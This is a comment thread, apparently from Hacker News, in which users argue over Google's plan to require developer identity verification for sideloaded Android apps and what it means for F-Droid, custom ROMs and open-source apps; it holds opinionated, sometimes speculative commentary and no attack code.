Guess whether the makers of alternative YouTube clients will want to tell Google, "Hey, this is a copy of our ID card our address"...
The worst part is the Orwellian opening sentence they start with in their blog post [0]:
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
[0] https://android-developers.googleblog.com/2025/08/elevating-...
"A recent analysis by the company found that there are “over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.”
Ok, but what's the real damage? In other words, how many installs and how much money siphoned from users and legit apps?
The new face of Embrace, Extend, Extinguish.
That's not a good move at all.
Hopefully this increases the communal pressure to find a real alternative to android.
Disgusting, horrifying, but utterly predictable. A dark day indeed, once no major mobile platform allows running whatever code you wish. Sideloading isn't really sideloading if the app has to be signed by the gatekeeper.
Isn't this a death knell for F-Droid, at least for running on most hardware? Since they require their own builds/attestation?
The Overton Window for computing keeps inching towards gatekeepers having total control over devices. I can't help but imagine myself lurching along on the last somewhat open hardware I can cobble together in a couple of decades, because I refuse to drink the verification can to continue...
This was probably the reason Nokia died. Symbian development, already cumbersome and app deployment required some such procedure. I remember there was an joint effort in a china based forum and many of us got a cert and a key for our phones. I was reading Nokia obituaries from its executives and the sorry state of Symbian development and app deployment was not considered as a cause. So here it, is young executives repeating a simplistic and destructive strategy. ibm, xerox, nokia and intel will be very proud.
Hmm this is weird. I've recently been considering switch back to Android because of how locked down ios is and it sounds like Google's now gonna do the same thing? Will there be a way to deactivate this?
Google to make sideloading Android apps _harder_ by _force_ verifying developer identity for 25$ and bunch of legal documents.
If you read the article you'd see that this is a separate account type that does not have a submission fee or require legal documents. It also doesn't prevent you from side loading. It's just part of the current scare screen system when it comes to side loading.
> separate account type that does not have a submission fee or require legal documents
We do not know yet who will be considered "hobbyist". I would say they might check the user base. When hitting app installation threshold for let say 1,000 users, they will force you to pass the full legal check. Otherwise they will start blocking any further installations.
The only promises on the announcement are:
> Verify your identity
> * You will need to provide and verify your personal details, like your legal name, address, email address, and phone number. > * If you're registering as an organization, you'll also need to provide a D-U-N-S number and verify your organization's website. > * You may also need to upload official government ID.
Only one of those three applies to organizations.
>A note for student and hobbyist developers: we know your needs are different from commercial developers, so we’re creating a separate type of Android Developer Console account for you.
Nothing about it says anything about having lighter requirements, just not going through a Play Console link. Even if the requirements end up being "lighter", the minimum will always be at least "link a Google account", which is already a massive privacy breach.
> It also doesn't prevent you from side loading.
It absolutely does. Quoting from Google:
>Starting next year, Android will require all apps to be registered by verified developers in order to be installed by users on certified Android devices.
certified Android devices being... 99.9% of all Android devices in existence.
https://android-developers.googleblog.com/2025/08/elevating-...
Then you're familiar with the process of getting a DUNS number. Because that is a massive barrier for individual devs and small teams. That is actual legal paperwork. Not having to do that makes the process significantly easier.
It's not a massive privacy breach. If you are so anti-Google yet use their devices then most likely you're already only distributing to GrapheneOS or LineageOS anyway. For most people who already have a Google account this is a very small bar to clear.
It. Doesn't. Matter.
Getting a DUNS number is ass, getting the 20 testers is ass, etc etc.
I do not want to give Google my government ID to write a shitty little app that only my family will use, or only close friends use and it gets sideloaded through sending it on chat. I do not want people making apps to skip ads on YouTube giving out their government ID. I do not want people making apps that might get them in trouble with their government to give out their government ID to Google.
So then don't. Are you seriously scared for the revanced devs? Their code is posted on Github. Their accounts are all public accounts with names and locations. Maybe don't white knight people who don't need it.
You failing to see the issue and dismissing is so easily is mind blowing. Revanced is nothing, he is referring to a whole ecosystem of app made by randomn for other random that Google should have no business requiring government id and giving approval.
Hong Kong protestors bought Android phone en masse when Apple removed apps they used to fight back on Chinese censorship, if Google is allowed to do the same you can say goodbye to freedom of information in many countries. You’re focusing on revanced when it’s the least of the issue.
Are there any competing phone OS'es still around? Maybe there is something in China I dont have a view on?
https://en.wikipedia.org/wiki/HarmonyOS
It does have an Android subsystem stuck on, but it's not necessary.
Will this be what finally leads to the success of a fully open-source Android fork such as CalyxOS or GrapheneOS?
CalyxOS is already dead. GrapheneOS is the only hope.
https://calyxos.org/news/2025/08/01/a-letter-to-our-communit...
Will this affect GrapheneOS users who have Play Protect / Services disabled? Wondering how they intend to do the verification.
Sideloading is the only reason I'm on Android. When it goes away, I will be better with an Apple device.
I saw this coming a mile away. Everyone said you could install whatever you wanted on Android, but you were always jumping through some crazy hoops to do so. (compared to a general propose computer)
Holy shit, going to the official page[1], there's something that is somehow even worse than the loss of freedom:
"You'll need to prove you own your apps by providing your app package name and app signing keys."
That is capital-I Insane.
[1] https://developer.android.com/developer-verification
This is confusing, since signing something already proves that you own the key.
My assumption is they want to eliminate/prevent schemes where a ton of apps are signed as a service by a small number of centrally controlled keys.
Someone elsewhere in the thread said this is how F-Droid works, but I can't confirm firsthand.
The signing certificate should indicate who is signing, and therefore who is liable. But maybe that’s not how they set it up previously.
they've been demanding signing keys for apps distributed on the play store for years.
The only credible explanation I can come up with is that they need the keys in order to produce indistinguishably backdoored versions of applications, handy for tools like signal.
Otherwise one would never think of requesting the private keys-- if google wants to rebuild apps themselves they could sign with their own keys and possessing anyone elses private key is just pure liability as if there is any discovered abuse they can't show that they weren't the vector.
So sketchy!
From the announcement
> our recent analysis found over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.
I will believe this when we stop seeing brazen malware in marquee app store apps, e.g. https://www.tracesecurity.com/blog/articles/meta-pixel-and-t...
How does this affect installing an APK to an offline device?
Will there be a local override?
Well I guess that's good bye Pixel and Android for me then.
I'm curious what is going to happen to all those Chinese ROMs and third-party Chinese app stores.
China will push own Android OS forks into other markets even harder, if they do it fully open-source then bonus for them, users will force devs (banking apps etc) to get more support. A good example is one EU bank which publishes to Huawei's AppGallery to support non-Google certified Android phones.
You know how folks in the UK are cutting the surveillance cameras, what is the equivalent here?
Not updating Android I guess
This is the final nail in the coffin for personal computing
It's a blow, but this is over dramatic.
With more and more things like this, we need to back to making native apps on desktops and laptops where we as the users are in control.
Does this break F-Droid?
Would be a tragedy if it did. So many interesting and useful apps there without the obnoxious ads or nagging to upgrade.
I'm entirely on F-Droid, with no Google account and no Play Store. Losing F-Droid would force me off Android.
I'm the same. No Google account since 2012. F-Droid is an amazing community effort and has enabled me to find so many great open source applications.
Same.
One thing that annoys me is that a lot of F-Droid apps are obviously naive ports with overbroad permissions like "can read the entirety of storage", but that's still better than the all-consuming Goo.
Maybe F-Droid can sign all packages themselves? Would google let them do that?
The risk is Google could ban all F-Droid apps in one step, which will happen for sure.
"Can?" Sure.
"Would?" Google has zero incentive to do that.
These companies need to be destroyed by antitrust violations. I am so tired of these tech companies abusing their market position. I want the FTC to stop being toothless and useless and just absolutely crush these companies. The amount of disdain I have for these companies can't even be properly expressed.
These companies are in bed with the government, you're not going to be saved by any legislation. Many people on this site supported Google censoring the Covid anti-vax idiots, but it should have made it very clear that Google was working at the behest of the government. They're in bed together; the government gets to do an end-run around the constitution, and Google gets to rely on special government privileges and protection. Win-win.
These corpos are part of the government, more or less, and they simply implement the edict to get rid of privacy. Not only in America. Smartphones have become eyes of the govs, while the Internet - something akin to their neural system. What's more interesting is why the govs feel so paranoidal and insecure recently? What are they afraid of?
I rely on an open source app called xDrip to manage my diabetes. It's way way way better than any of the official apps. It's not distributed on the app stores for obvious reasons. Many others rely on this app as well. Are we cooked?
This doesn't seem to be going over well.
Only developers care. The users don't even know what sideloading is. This will successfully kill off the single remaining freedom users have.
It seems that it was only about time… it just feels like the pace of enshittification with big tech being able to get away with anything is crazy!
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such mountain of complexity that seems like only a billion/trillion dollar big tech company can make an OS.
But then again, some body called BS on browsers and we might have a good option soon in Ladybug!
https://www.crowdsupply.com/sutajio-kosagi/precursor
Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
>GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
> iOS devices [..] have much less data collection than stock Android
iOS does a tremendous amount of data collection including for the usage of ads as per Apple's privacy policy. All the same types of data that stock Android collects, even.
You may believe Apple is a generally better steward of that data than Google, but using iOS does not reduce the amount of data being hoovered up in any meaningful capacity.
> Now there's also no more sideloading, so what purpose does Android even serve anymore?
I hate this change, but I still prefer Android. iOS is hardly perfect nor does it do everything better...
Exactly, the only reason to be a weirdo and have android in the first place was because there's so many good apps available outside the play store, if they lock it down just like Apple then what's the point?
> what purpose does an open source OS have against a proprietary one
FOSS means a lot less than it used to in Android.
Can you download, build, and install a basic Android system these days without touching a single piece of closed code? Absolutely. Will it be able to do much without closed binaries? No.
Android isn't GNU/Linux where there's a general ethos of making everything in userland FOSS if at all possible. Rather, it's a free OS that both Google and manufacturers can do anything they want with, including shove a ton of spy and bloatware on it, then make it to where you can't get rid of those things, at least not easily.
The optimism from 15 years ago surrounding FOSS in the mobile space is on its deathbed.
I would argue any amount we can get is still lightyears better than not being able to replace or inspect anything at all on the system.
A phone running just the FOSS parts of Android is not super viable for the average person.
> Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
Because Google-free AOSP-derived Android distributions are far more versatile, offer far more freedom, impose far fewer restrictions and tend to end up being far less expensive than whatever the fruit factory decides their dedicants have to use today. If Google goes the way of the fruit folks and AOSP no longer offers these freedoms the next step is not to surrender to the Church of Apple but to find a way to evade those restrictions.
So that's how they kill newpipe.
Phew! I was just about to get the new Pixel too, not going to now. I wonder if Samsung will be effected.
> The changes will affect all certified Android devices once live
I think that is a yes, it will affect Samsung
Yeah, I think anything that has Google Play would fit that qualifier. So that's basically all major devices (in the West, at least). Oof.
It'd be really funny if Chinese Android devices actually end up being more free because they don't have any of the Google Play stuff on them.
Never, I'll stick to LineageOS till it ceases to exist.. then I'll just buy a dumbphone, f... Google!
So Google won't even offer a system toggle to let users install an app they've made or copied?
Google don't even expose a per-app toggle for app Internet access, why am I surprised?
This is disgusting.
Freedom died a little bit more today.
Why is end-user choice and consent not considered?
It's really disturbing that the EU and Google would do this.
I can't recommend Android or iPhone because of this nonsense.
> Why is end-user choice and consent not considered?
The elimination of user choice was very much considered. In fact, it's the primary goal.
I wonder, how hard is it to build an app on the phone from source?
This means that for example I will not be able to side load Popcorn Time for Android [1] anymore?
[1] https://github.com/popcorn-official/popcorn-android
> Google is explicit today about how “developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer.”
« Développer will have freedom » yet they are entitled to Google’s verification.
It’s just another stone in the grave of Android and even though I shipped off this sinking ship 6 years ago to iOS, this is still concerning because ultimately apple’s IOS is in competition solely with Android.
If Android gets so bad it has all the disadvantage of iOS, some more, for instance with the embedded spyware that manufacturer are paid to include, and none of the good side of iOS, then everyone lose. Apple doesn’t have to compete anymore, they just have to not suck.
Can you even compile an iOS app without registering with apple?
Without an apple ID you can compile an iOS app, but can only run it in an iPhone Simulator on a Mac.
With a free apple ID (no additional registration needed) you can also install your compiled iOS app on your iPhone and have it working for 7 days before you need to re-install it.
Is it really different from what Google is doing ? Not being to compile or user not being to install have the very same consequence : your app can’t be used.
This has the potential to be disastrous for Google, but maybe not.
Personally: I don't use Apple because I like being able to whip together little apps to side-load without having to check in with a walled-garden mothership. If Google is going to move closer to Apple in that regard... Apple's UX ecosystem is better, so I have far fewer reason to keep using Android.
I suspect this won't be disastrous for Google, because where will people care about this go? Apple, who is even more restrictive? This is just another in a long series of incidents showing why we desperately need a real alternative to the mobile duopoly. I would ditch Android over this, but there's no realistic alternative available to me.
Damn the future sucks ass.
I think the only thing hat can save us is a jailbreak. Either for iOS or Android to let you sideload apps.
Alternatively, and that’s almost bullshit, the dumb phone trend continues and we might get devices like PDAs. Get a dumb phone and a small camera and then your PDA for everything that is essentially an app. Not sure what OS they’d run but I don’t see another way.
Android also allows apps that can run arbitrary code, like emulators and various other runtimes. I think iOS still doesn't? I have not written an Android app in ages, other than at work, but I often write silly little things running in the Löve 2D Loader, or TIC-80, or DOSBox, or just command-line tools running in Termux (I hear there is an X-server as well to run GUI applications from Termux?).
As long as they still allow running stuff inside of apps like that I will probably not abandon ship yet.
https://www.gnu.org/philosophy/right-to-read.en.html
Well this is me moving to E/OS full time.
What does this mean for projects like Grapheneos, or fdroid?
"The changes will affect all certified Android devices once live". AKA GrapheneOS should remain unaffected (as it is not "certified", per Google parlance), and F-Droid should remain available - in theory.
If they keep up this "boil the frog slowly" crap though, I may be migrating off of Android and over to a strictly Linux-based phone, like a PinePhone, Librem, etc.
Fuck the scumbags at the top of big tech making decisions like these.
Next step: require all "certified" devices to prevent unlocking the bootloader... then possibly kill AOSP...
I have no words.. or more precisely, those words are not the kind of words I'm allowed to write here.
AOSP is being killed piece by piece - zero community engagements, infrequent dumps with no commit logs, moving everything into Google Play services and recently no more binaries for Pixel phones just to make third party ROM developers lives a little more miserable.
Of course they will. It started with Play Integrity and hardware remote attestation. Soon Android will be nothing but a shittier version of iOS.
goodbye newpipe :(
Fuck google.
This combined with the 'age verification' coming to all Google properties means it is a very small step from that new world to full Google verification of everything you visit and everything on your device, at any time, for any reason with the penalty being incontestable ban from your device, apps and data.
Get ready for facebook style 'we are interrupting you for a video selfie because we have detected you are a threat' across all google properties (Android, Chrome, Gmail, Maps...).
Move to linux phones, now.
Oh how I wish I could buy a Nokia N900 16 Pro Max and use Maemo 13
Dick move. Go back to "do no evil" big G. Remember how you used to be the kool kid on the block? Now you've just become the grown up you showed contempt for in your prime time.
I doubt I'll move away from Android too soon, but that definitely makes me reconsider whether any Google services have a right to CPU time on my device.
(Responding to https://techcrunch.com/2025/08/25/google-will-require-develo... )
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
This isn't legal in the EU is it?
It is. Notarization like Apple does is also legal. In fact the EU commission would welcome this with open arms since they can now access the personal data of every developer and can order Google to ban every app they want. This goes hand-in-hand with their new "Digital wallet" app that will be launched next year.
if we continue this direction, in a couple of years, a feature phone might be an excellent choice!
Absolutely disgusting. No reason to keep using Android then.
Google is really turning into a dystopian company, destroying any goodwill their virtuous employees created in the past. It feels like they are primed to be the main turnkey tyranny facilitators.
Google was always dystopian and evil. They just wore good mask for some time in the beginning.
Juggling between Maemo and iOS back in the day I always thought it was so wild that I later years people thought of Android as the open alternative.
Keep your phone. All you have to do is say no to digital for:
- money - tickets - identification
They cannot force everyone to own and buy a phone.
No, fuck you. Absolutely not.
How will this affect GrapheneOS?
Source: https://android-developers.googleblog.com/2025/08/elevating-... (https://news.ycombinator.com/item?id=45016602)
Gives me another reason to use Custom ROM
Additionally, this kills apps like Revanced, NewPipe, SmartTube that will now be required to give out ID to Google, surely that's something they really want to do. All Open source development is at threat, Google's absolute dogshit procedures already imposed for the play store now imposed to the entire ecosystem. All for a shitty system that breaks down to "registering package names". Cool then, guess it's time to typo squat on every variant of com.faceboook.app, because users definitely check the package name and not "oh the icon is right and so is the title".
More and more locked down devices, Android source releases only being published once a year, device drivers for reference devices disappearing, and now, verification of all your software for your "security". The war on general computing is well and truly on.
What the absolute fuck.
Imagine MS doing the same for Windows.
It’s sad that smartphones now hold so much personal and private data but aren’t really under the control of their users.
> Imagine MS doing the same for Windows.
They already have a version of that - it's called Windows S Mode (Windows Store apps only, no EXEs or scripts, Edge only for browsing). If they get away with it, they would make it the default. Required Microsoft accounts was a step in that direction.
This is what caused gaben to create steamos which is now a somewhat viable ecosystem with the steamdeck and rumored machines
> Imagine MS doing the same for Windows.
It will happen. We've been the frogs boiled in the pot for years, accepting forced attestation. Eventually they'll close off running unsigned code, and the PCs will probably have bootloaders locked to Windows as well, so you can't escape.
So, now there will be a single kill switch where a malicious government can legally compel Google to annihilate apps not of their liking.
I find it hard to state how contemptible this is. How stupid. Everyone who worked on this has blood on their hands.
has anyone had to help any elderly relative with the million scams they've downloaded from google's app store? google does not give a shit about helping regular people avoid scams, it's all just bullshit.
not even to mention the h1b indian kickback stuff that's about to hit them. couldn't happen to a nicer company.
Helping elderly with scams: Yes, today, with Google Chrome. They got tricked into allowing desktop notifications and they look super legit on Microsoft Windows, styled like antivirus notifications and everything, covering the browser UI to get to the settings. I don't see how using closed software helps here
I don't understand, when the EU announced that Apples "actually we need to sign all of these and pay us" requirement is illegal, Google was like "hold my beer"?
Break them up already, it's getting old.
Boooo. Fuck this noise! Might as well run iOS at this point, unless your use case needs Android only apps or workflows.
What a fucking joke.
Sorry, we're getting rid of Revanced, Newpipe, Xmanager, etc. for your own good. Just like how Manifest v3 was for security. /s
That might be one of the reasons. Get rid of competition by legal means.
In my case I keep a copy of K9 Mail 5.6 with the original UI (the reason I choose K9) and I sideload it to every device of mine. I'm afraid that I'll have to register an account and what, claim that that K9 is mine?
Well time to make sure mobile Linux is accessible so the blind users aren't the only ones left when all the world switches to Linux /s
Year of mobile Linux OS? /s
[dead]
[dead]
Maybe Elon Musk can save us /s
While I like to jump on the Google bash train as much as anyone, this is to comply with EU laws.
Apple implemented a similar change for the EU App Store earlier this year to comply with the Digital Services Act (DSA), a regulation that now requires app developers to provide their “trader status” to submit new apps or app updates for distribution.
But this is for apps outside the Play store, so the DSA isn’t at play here insofar as Google needs to be concerned. I don’t think there’s any solid decision on whether third-party app distribution is subject to the trader requirements, but if/when there is, it’d presumably be on the alternative distribution platform to enforce, not Google. Plus, Google already adjusted its policies to comply with the DSA.
For the record, Apple notes that the DSA requirements only impact developers distributing through the App Store, not through alternative distribution [1].
[1]: https://developer.apple.com/help/app-store-connect/manage-co...
> for distribution.
I.e. it doesn't require this at all, it merely requires Google require verification for apps that they themselves distribute. What they've been doing all along until now plus or minus minor bookkeeping details on what data they collect.
So they (or rather TC) claim. Does the DSA actually require it, though?
Just wonderful. Why does Europe insist on imposing regulations like this that companies then force on the rest of the world? It's one thing if they're benign but this very much isn't.
Only monetized apps (whether that be directly paid, microtransactions, ads, etc.) are legally required to go through that process - and it's a perfectly sensible requirement for the government to say "if you want to run a business, you need to do so as a business".
That is most apps - but not the kind of apps Google is attacking here (personal-scale, actually-free, third-party, etc.). And "apps that are not monetized" is actually a very nice thing to filter for from a user perspective.
Of course, the world's largest malware vendors love to use government action as an excuse to do something else malicious.
IANAL, but I don't see how that applies to apps that Googled doesn't distribute.
There is no law in EU which requires Thailand-based developers to provide their trader status in order to serve Thai customers. Stop making shit up.
They usually fight harder against such laws if they don’t suit them.
Seems reasonable
I don't like it, however I do feel sympathy for Google. There are probably a lot of idiots who download spyware.apk, it breaks other legitimate apps, steals their information, and then they go online and complain about how Android isn't secure or otherwise doesn't work.
Users should be allowed to brick their device if they're sufficiently stupid, but I feel bad for Google who has to deal with some of those people blaming them.
You don't need to feel bad for them, the Play Store is full of malware so what makes you think this change will help? This is a self-inflicted problem.
I would be surprised if Android has a reputational issue among users. Maybe at the margins, but not enough to significantly affect market share. Most people have already sorted into iOS and Android camps already.
To whatever extent Google may be responding to an issue arising from the market, it is likely at the behest of large companies, especially payment processors, payment card networks, banks, etc. These institutions lately have begun to exert increasing influence over end-user activities, and it would not surprise me if they are playing a part here, too.
Why is there no sensible behaviour and knowledge around APK installation like there is about any piece of software on a personal computer?
It is also common for people to install things on Windows without thinking critically. It is perhaps less common on Mac OS, but I've seen someone get malware that way.
My position is that this is not the OS vendor's responsibility to prevent. A warning is fine. A scan for known malware by default is fine. Beyond that, it's my device and it's my choice to get software from wherever I damn well please even if it might be a bad idea.
I have little to no evidence that there is sensible behavior and knowledge around software on personal computers.
The biggest difference these days is most folks don't even use a personal computer.
But there is far more education and knowledge that it is a bad thing.
Because only 5% of American adults are highly literate with technology, 30% of working adults self-identify as "never (ever!)" using folders and files for organization, and most people have better things to do with their time to be taught to perfectly analyze the safety of an App Store. Don't hope in the next generation either - only 38% of Gen Z could successfully complete tasks more difficult than moving an email between folders, while an IEA study found that only 2% of Gen Z had reached the anticipated "digital native" stereotype level of fluency.
Can you please post the source of the study?
I would argue that Gen Z is worse at computers than Millennials specifically because we put too many guardrails in place to make computing easy for the illiterate. Now we are all paying the price, as user agency is continually eroded away to further protect the dumb from their own unwillingness to gain a basic understanding of the very tools critical to their daily life.
Firstly what is the source and secondly, the US is not the majority user of mobile phones and especially not android.
I don't really understand. These people would never download F-droid in the first place or go into settings to enable dev mode.
And besides if you really want to combat fraud stop using creditcards for fuck sake and make a modern payment system that doesn't rely on 1970s technology.
What makes you think that people are sensible about installing shit on their personal computers?
They're not, and Windows got decades of hate for it. Google probably wants no part in that, especially since Apple mostly avoids viruses and malware through their app store
This is just an excuse. Google doesn't care about these people, they already proved that by showing scammy advertisements, as long as they get their profits, they don't care. Don't fall for this "it's for your security" argument.
It’s an excuse they use. The don’t care if your average grandmother gets infected by a virus.
This trust me bro, our App Store is safer is just getting on my nerves. Every day we get malware popping on both app stores.
Time to switch